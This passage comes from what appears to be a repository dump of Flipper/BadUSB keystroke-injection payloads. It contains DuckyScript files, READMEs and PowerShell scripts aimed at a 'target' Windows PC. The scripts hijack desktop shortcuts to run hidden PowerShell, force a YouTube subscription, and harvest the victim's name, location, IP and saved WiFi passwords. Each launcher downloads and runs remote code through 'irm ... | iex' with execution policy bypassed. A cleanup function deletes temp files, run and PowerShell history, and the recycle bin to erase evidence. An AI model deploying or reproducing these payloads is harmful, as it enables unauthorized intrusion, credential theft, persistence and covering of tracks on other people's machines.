shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload\n```\npowershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "Payloads/Flip-ShortcutJacker/Shortcut-Jacker-Execute.txt", "content": "REM Title: Shortcut-Jacker\nREM Author: I am Jakoby\nREM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop\nREM Target: Windows 10, 11\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass iwr LINK | iex\nENTER\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Execution | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n \n<#\n.SYNOPSIS\n\tThis is payload used to inject PowerShell code into shortcuts.\n\n.DESCRIPTION \n\tThis payload will gather information on the shortcuts on your targets desktop.\n \tThat data will then be manipulated to embed a PowerShell script.\n \tThis script will be ran in the background when the short cut is. \n\n#>\n\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThe PowerShell code stored in this variable is what will run in the background.\n\tThis field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code \n\tvariable and it will still run.\n#> \n\n$code = \"Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')\"\n\n############################################################################################################################################################\n\nfunction Get-Shortcut {\n param(\n $path = $null\n )\n\n $obj = New-Object -ComObject WScript.Shell\n\n if ($path -eq $null) {\n $pathUser = [System.Environment]::GetFolderPath('StartMenu')\n $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')\n $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse \n }\n if ($path -is [string]) {\n $path = dir $path -Filter *.lnk\n }\n $path | ForEach-Object { \n if ($_ -is [string]) {\n $_ = dir $_ -Filter *.lnk\n }\n if ($_) {\n $link = $obj.CreateShortcut($_.FullName)\n\n $info = @{}\n $info.Hotkey = $link.Hotkey\n $info.TargetPath = $link.TargetPath\n $info.LinkPath = $link.FullName\n $info.Arguments = $link.Arguments\n $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}\n $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}\n $info.WindowStyle = $link.WindowStyle\n $info.IconLocation = $link.IconLocation\n\n return $info\n }\n }\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nfunction Set-Shortcut {\n param(\n [Parameter(ValueFromPipelineByPropertyName=$true)]\n $LinkPath,\n $IconLocation,\n $Arguments,\n $TargetPath\n )\n begin {\n $shell = New-Object -ComObject WScript.Shell\n }\n\n process {\n $link = $shell.CreateShortcut($LinkPath)\n\n $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |\n Where-Object { $_.key -ne 'LinkPath' } |\n ForEach-Object { $link.$($_.key) = $_.value }\n $link.Save()\n }\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nfunction hijack{\n$Link = $i.LinkPath\n$Loc = $i.IconLocation\n$TargetPath = $i.TargetPath\nif($Loc.length -lt 4){$Loc = \"$TargetPath$Loc\"}\n$Target = $i.Target\nif(Test-Path -Path \"$Link\" -PathType Leaf){Set-Shortcut -LinkPath \"$Link\" -IconLocation \"$Loc\" -Arguments \"-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code\" -TargetPath \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"}\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nGet-ChildItem –Path \"$Env:USERPROFILE\\Desktop\" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}\n" }, { "path": "Payloads/Flip-Subscribe/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Subscribe\n\nA script I put together to make your target subscribe to your YouTube channel.\n\n## Description\n\nThis script is set to open your YouTube account in their browser where they will be prompted to subscribe to you. \nSPOILER: They do.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n* Your target will have to be signed into their YouTube account\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* 15 seconds later you have a new subscriber\n* Your youtube url needs to be inside both double and single quotes \" ' url ' \"\n```\npowershell -w h -NoP -Ep Bypass $channel=\"'youtube.com/iamjakoby'\";irm jakoby.lol/wj4 | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-Subscribe/Subscribe.ps1", "content": "Add-Type -AssemblyName System.Windows.Forms\n$o=New-Object -ComObject WScript.Shell\n$url = -join($channel,\"?sub_confirmation=1\")\nStart-Process \"$url\" \nStart-Sleep -Seconds 5\n[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)\n[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')\nStart-Sleep -Seconds 1\n[System.Windows.Forms.SendKeys]::SendWait('%{F4}')\n" }, { "path": "Payloads/Flip-Subscribe/Subscribe.txt", "content": "REM Title: Subscribe\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to make your target subscribe to your YouTube channel\n\nREM Target: Windows 10, 11\n\nREM Your youtube url needs to be inside both double and single quotes \" ' url ' \" \n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $channel=\"'youtube.com/iamjakoby'\";irm jakoby.lol/wj4 | iex\nENTER\n" }, { "path": "Payloads/Flip-WallPaper-URL/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Wallpaper-URL\n\nThis payload will download an image from any URL and set it as the target's wallpaper. \n\n## Description\n\nUse this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script. \nRun this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes.\nLastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped.\n\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n* Place your images URL in the $url variable\n```\npowershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1", "content": "# URL is for if you want to host your own copy of this payload\n\n#$url = \"\"\n\n\n$wp = \"$Env:tmp\\---wp.png\"\n\niwr $url -O $wp\n\nFunction Set-WallPaper {\n \nparam (\n [parameter(Mandatory=$True)]\n # Provide path to image\n [string]$Image,\n # Provide wallpaper style that you would like applied\n [parameter(Mandatory=$False)]\n [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]\n [string]$Style\n)\n \n$WallpaperStyle = Switch ($Style) {\n \n \"Fill\" {\"10\"}\n \"Fit\" {\"6\"}\n \"Stretch\" {\"2\"}\n \"Tile\" {\"0\"}\n \"Center\" {\"0\"}\n \"Span\" {\"22\"}\n \n}\n \nIf($Style -eq \"Tile\") {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 1 -Force\n \n}\nElse {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 0 -Force\n \n}\n \nAdd-Type -TypeDefinition @\" \nusing System; \nusing System.Runtime.InteropServices;\n \npublic class Params\n{ \n [DllImport(\"User32.dll\",CharSet=CharSet.Unicode)] \n public static extern int SystemParametersInfo (Int32 uAction, \n Int32 uParam, \n String lpvParam, \n Int32 fuWinIni);\n}\n\"@ \n \n $SPI_SETDESKWALLPAPER = 0x0014\n $UpdateIniFile = 0x01\n $SendChangeEvent = 0x02\n \n $fWinIni = $UpdateIniFile -bor $SendChangeEvent\n \n $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)\n}\n\nfunction Target-Comes {\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n$o=New-Object -ComObject WScript.Shell\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n}\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\nTarget-Comes\nSet-WallPaper -Image $wp -Style Fill\nClean-Exfil\n" }, { "path": "Payloads/Flip-WallPaper-URL/Wallpaper-URL.txt", "content": "REM Title: Wallpaper-Troll\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload will change your targets wallpaper to an image from a provided url\nREM Target: Windows 10, 11\nREM\nREM --------------------------------------------------------------------------------------\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\nREM --------------------------------------------------------------------------------------\nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex\nDELAY 500\nENTER\n" }, { "path": "Payloads/Flip-Wallpaper-Troll/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Wallpaper-Troll\n\nA script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.\n\n## Description\n\nThis program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords. This information will be saved to a file that is then converted to a .BMP image. That image will be saved to their desktop and saved as their wallpaper. Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file.\n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-Wallpaper-Troll/wp-troll.jpg)\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n\n.DESCRIPTION \n\tThis program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude, \n\tPublic IP, the SSID, and WiFi password of any current or previously connected to networks.\n\tIt will take the gathered information and generate a .jpg with that information on show.\n\tFinally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.\n\tAdditionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.\n#>\n#############################################################################################################################################\n\n# this is the message that will be coded into the image you use as the wallpaper\n\n$hiddenMessage = \"`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby\"\n\n# this will be the name of the image you use as the wallpaper\n\n$ImageName = \"dont-be-suspicious\"\n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will get the name associated with the microsoft account\n#>\n\n function Get-Name {\n\n try {\n\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\n\n }\n \n # If no name is detected function will return $null to avoid sapi speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No name was detected\" \n return $env:UserName\n -ErrorAction SilentlyContinue\n }\n\n return $fullName\n\n}\n\n$fn = Get-Name\n\necho \"Hey\" $fn >> $Env:temp\\foo.txt\n\necho \"`nYour computer is not very secure\" >> $Env:temp\\foo.txt\n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis is to get the current Latitude and Longitude of your target\n#>\n\nfunction Get-GeoLocation{\n\ttry {\n\tAdd-Type -AssemblyName System.Device #Required to access System.Device.Location namespace\n\t$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object\n\t$GeoWatcher.Start() #Begin resolving current location\n\n\twhile (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {\n\t\tStart-Sleep -Milliseconds 100 #Wait for discovery.\n\t} \n\n\tif ($GeoWatcher.Permission -eq 'Denied'){\n\t\tWrite-Error 'Access Denied for Location Information'\n\t} else {\n\t\t$GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.\n\t\tif ($GL) { echo \"`nYour Location: `n$GL\" >> $Env:temp\\foo.txt }\n\t}\n\t}\n # Write Error is just for troubleshooting\n catch {Write-Error \"No coordinates found\" \n return \"No Coordinates found\"\n -ErrorAction SilentlyContinue\n } \n\n}\n\nGet-GeoLocation\n#if ($GL) { echo \"`nYour Location: `n$GL\" >> $Env:temp\\foo.txt }\n\n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will get the public IP from the target computer\n#>\n\n\nfunction Get-PubIP {\n\n try {\n\n $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content\n\n }\n \n # If no Public IP is detected function will return $null to avoid sapi speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"No Public IP was detected\" \n return $null\n -ErrorAction SilentlyContinue\n }\n\n return $computerPubIP\n}\n\n$PubIP = Get-PubIP\nif ($PubIP) { echo \"`nYour Public IP: $PubIP\" >> $Env:temp\\foo.txt }\n\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tPassword last Set\n\tThis function will custom tailor a response based on how long it has been since they last changed their password\n#>\n\n\n function Get-Days_Set {\n\n #-----VARIABLES-----#\n # $pls (password last set) = the date/time their password was last changed \n # $days = the number of days since their password was last changed \n\n try {\n \n $pls = net user $env:USERNAME | Select-String -Pattern \"Password last\" ; $pls = [string]$pls\n $plsPOS = $pls.IndexOf(\"e\")\n $pls = $pls.Substring($plsPOS+2).Trim()\n $pls = $pls -replace \".{3}$\"\n $time = ((get-date) - (get-date \"$pls\")) ; $time = [string]$time \n $DateArray =$time.Split(\".\")\n $days = [int]$DateArray[0]\n return $pls\n \n }\n \n # If no password set date is detected function will return $null to cancel Sapi Speak\n\n # Write Error is just for troubleshooting \n catch {Write-Error \"Day password set not found\" \n return $null\n -ErrorAction SilentlyContinue\n }\n}\n\n$pls = Get-Days_Set\nif ($pls) { echo \"`nPassword Last Set: $pls\" >> $Env:temp\\foo.txt }\n\n\n###########################################################################################################\n\n<#\n\n.NOTES \n\tAll Wifi Networks and Passwords \n\tThis function will gather all current Networks and Passwords saved on the target computer\n\tThey will be save in the temp directory to a file named with \"$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt\"\n#>\n\n\n# Get Network Interfaces\n$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress \n\n# Get Wifi SSIDs and Passwords\t\n$WLANProfileNames =@()\n\n#Get all the WLAN profile names\n$Output = netsh.exe wlan show profiles | Select-String -pattern \" : \"\n\n#Trim the output to receive only the name\nForeach($WLANProfileName in $Output){\n $WLANProfileNames += (($WLANProfileName -split \":\")[1]).Trim()\n}\n$WLANProfileObjects =@()\n\n#Bind the WLAN profile names and also the password to a custom object\nForeach($WLANProfileName in $WLANProfileNames){\n\n #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user\n try{\n $WLANProfilePassword = (((netsh.exe wlan show profiles name=\"$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()\n }Catch{\n $WLANProfilePassword = \"The password is not stored in this profile\"\n }\n\n #Build the object and add this to an array\n $WLANProfileObject = New-Object PSCustomobject \n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value $WLANProfileName\n $WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value $WLANProfilePassword\n $WLANProfileObjects += $WLANProfileObject\n Remove-Variable WLANProfileObject\n}\n if (!$WLANProfileObjects) { Write-Host \"variable is null\" \n }else { \n\n\t# This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage\n\n\techo \"`nW-Lan profiles: ===============================\" $WLANProfileObjects >> $Env:temp\\foo.txt\n\n$content = [IO.File]::ReadAllText(\"$Env:temp\\foo.txt\")\n\t}\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will get the dimension of the targets screen to make the wallpaper\n#>\n\nAdd-Type @\"\nusing System;\nusing System.Runtime.InteropServices;\npublic class PInvoke {\n [DllImport(\"user32.dll\")] public static extern IntPtr GetDC(IntPtr hwnd);\n [DllImport(\"gdi32.dll\")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);\n}\n\"@\n$hdc = [PInvoke]::GetDC([IntPtr]::Zero)\n$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width\n$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height\n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will get take the information gathered and format it into a .jpg\n#>\n\nAdd-Type -AssemblyName System.Drawing\n\n$filename = \"$env:tmp\\foo.jpg\" \n$bmp = new-object System.Drawing.Bitmap $w,$h \n$font = new-object System.Drawing.Font Consolas,18 \n$brushBg = [System.Drawing.Brushes]::White \n$brushFg = [System.Drawing.Brushes]::Black \n$graphics = [System.Drawing.Graphics]::FromImage($bmp) \n$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) \n$graphics.DrawString($content,$font,$brushFg,500,100) \n$graphics.Dispose() \n$bmp.Save($filename) \n\n# Invoke-Item $filename \n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will take your hidden message and use steganography to hide it in the image you use as the wallpaper \n\tThen it will clean up the files you don't want to leave behind\n#>\n\necho $hiddenMessage > $Env:temp\\foo.txt\ncmd.exe /c copy /b \"$Env:temp\\foo.jpg\" + \"$Env:temp\\foo.txt\" \"$Env:USERPROFILE\\Desktop\\$ImageName.jpg\"\n\nrm $env:TEMP\\foo.txt,$env:TEMP\\foo.jpg -r -Force -ErrorAction SilentlyContinue\n\n\n#############################################################################################################################################\n\n<#\n\n.NOTES \n\tThis will take the image you generated and set it as the targets wall paper\n#>\n\nFunction Set-WallPaper {\n \n<#\n \n .SYNOPSIS\n Applies a specified wallpaper to the current user's desktop\n \n .PARAMETER Image\n Provide the exact path to the image\n \n .PARAMETER Style\n Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)\n \n .EXAMPLE\n Set-WallPaper -Image \"C:\\Wallpaper\\Default.jpg\"\n Set-WallPaper -Image \"C:\\Wallpaper\\Background.jpg\" -Style Fit\n \n#>\n\n \nparam (\n [parameter(Mandatory=$True)]\n # Provide path to image\n [string]$Image,\n # Provide wallpaper style that you would like applied\n [parameter(Mandatory=$False)]\n [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]\n [string]$Style\n)\n \n$WallpaperStyle = Switch ($Style) {\n \n \"Fill\" {\"10\"}\n \"Fit\" {\"6\"}\n \"Stretch\" {\"2\"}\n \"Tile\" {\"0\"}\n \"Center\" {\"0\"}\n \"Span\" {\"22\"}\n \n}\n \nIf($Style -eq \"Tile\") {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 1 -Force\n \n}\nElse {\n \n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force\n New-ItemProperty -Path \"HKCU:\\Control Panel\\Desktop\" -Name TileWallpaper -PropertyType String -Value 0 -Force\n \n}\n \nAdd-Type -TypeDefinition @\" \nusing System; \nusing System.Runtime.InteropServices;\n \npublic class Params\n{ \n [DllImport(\"User32.dll\",CharSet=CharSet.Unicode)] \n public static extern int SystemParametersInfo (Int32 uAction, \n Int32 uParam, \n String lpvParam, \n Int32 fuWinIni);\n}\n\"@ \n \n $SPI_SETDESKWALLPAPER = 0x0014\n $UpdateIniFile = 0x01\n $SendChangeEvent = 0x02\n \n $fWinIni = $UpdateIniFile -bor $SendChangeEvent\n \n $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)\n}\n\n#----------------------------------------------------------------------------------------------------\n\nfunction clean-exfil {\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n#----------------------------------------------------------------------------------------------------\n\nfunction Target-Comes {\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n$o=New-Object -ComObject WScript.Shell\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n}\n\n#----------------------------------------------------------------------------------------------------\n\nTarget-Comes\n\nSet-WallPaper -Image \"$Env:USERPROFILE\\Desktop\\$ImageName.jpg\" -Style Center\n\nclean-exfil\n \n" }, { "path": "Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt", "content": "REM Title: Wallpaper-Troll\nREM\nREM Author: I am Jakoby\nREM\nREM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.\nREM\nREM Target: Windows 10, 11\nREM\nREM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\nREM\nREM --------------------------------------------------------------------------------------\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\nREM --------------------------------------------------------------------------------------\nREM\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex\nDELAY 500\nENTER\n" }, { "path": "Payloads/Flip-We-Found-You/README.md", "content": 